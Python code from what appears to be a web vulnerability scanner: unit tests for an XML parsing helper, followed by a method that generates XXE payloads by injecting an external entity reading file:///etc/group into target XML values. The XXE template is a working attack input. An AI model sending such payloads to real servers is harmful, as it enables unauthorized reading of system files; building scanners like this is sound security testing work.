def test_parse_xml_negative():
# wrong format
test = utility.parse_xml("not-xml")
assert not test
# bad xml
test = utility.parse_xml("<test><error></test>")
assert not test
def test_parse_xml_positive(xmls):
# one text
test = utility.parse_xml(xmls[0])
assert isinstance(test, XmlDocument)
# two texts
test = utility.parse_xml(xmls[1])
assert isinstance(test, XmlDocument)
# inner text
test = utility.parse_xml(xmls[2])
assert isinstance(test, XmlDocument)
# no text
test = utility.parse_xml(xmls[3])
assert isinstance(test, XmlDocument)
def payloads(self, url, target, value):
"""
Returns the check's payloads. Uses the target's value to replace text instances with XXE payloads within XML.
:param url: url value
:param target: target name
:param value: target value
:return: list of payloads
"""
dynamics = []
# dtd template
template = '<?xml version="1.0"?><!DOCTYPE {} [<!ENTITY {} SYSTEM "file:///etc/group">]>'
# check xml format and parse
if value and value[0] == '<' and value[-1] == '>':
parsed = utility.parse_xml(value)
if parsed:
# set dtd and entity reference
dtd = template.format(parsed.root_tag, self._random)
entity = '&' + self._random + ';'
# add entity to each replacement
for replacement in parsed.replace(entity):
payload = dtd + replacement
dynamics.append(payload)
# return static and dynamic
return self._payloads + dynamics